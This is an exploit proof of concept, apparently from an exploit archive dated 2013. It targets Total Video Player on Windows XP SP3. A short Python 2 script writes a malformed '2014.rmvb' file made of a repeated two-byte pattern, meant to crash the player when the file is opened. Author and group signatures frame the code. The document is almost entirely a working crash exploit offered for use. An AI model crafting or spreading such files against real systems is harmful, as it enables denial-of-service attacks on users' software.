|
#####################################################################################################
# Total Video Player (.rmvb) Local Crash P.O.C
#####################################################################################################
# Date : 31/12/2013
# Author : JoKeR_StEx
# Software Download link : http://od.ccm2.net/www.commentcamarche.net/download/files/cnet_tvcc131_exe
# Tested 0N : WINDOWS XP SP3
#####################################################################################################
#!/usr/bin/python
# Crash
buffer = "\x46\x48" * 2014 # FK #
# File .rmvb
filename = "2014.rmvb"
crash = buffer
file=open(filename,"w")
file.write(crash)
file.close()
if file:
print"File Created successfully ^__^"
else:
print" Err0r :/ ..."
############################ <3 Happy New Year <3 #####################################################
# The Black Devils
# Dz Crazy L33ts
########################### <3 Happy New Year <3 ######################################################
|